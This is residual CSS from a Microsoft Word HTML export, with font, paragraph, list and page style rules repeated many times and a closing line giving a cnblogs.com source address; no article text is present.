border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
p.pre{
mso-style-name:"HTML 预设格式";
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
font-family:宋体;
font-size:12.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@font-face{
font-family:"Consolas";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
p.pre{
mso-style-name:"HTML 预设格式";
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
font-family:宋体;
font-size:12.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
原文地址:https://www.cnblogs.com/A66666/p/5bac0905ef9d9f470a0d279a83165789.html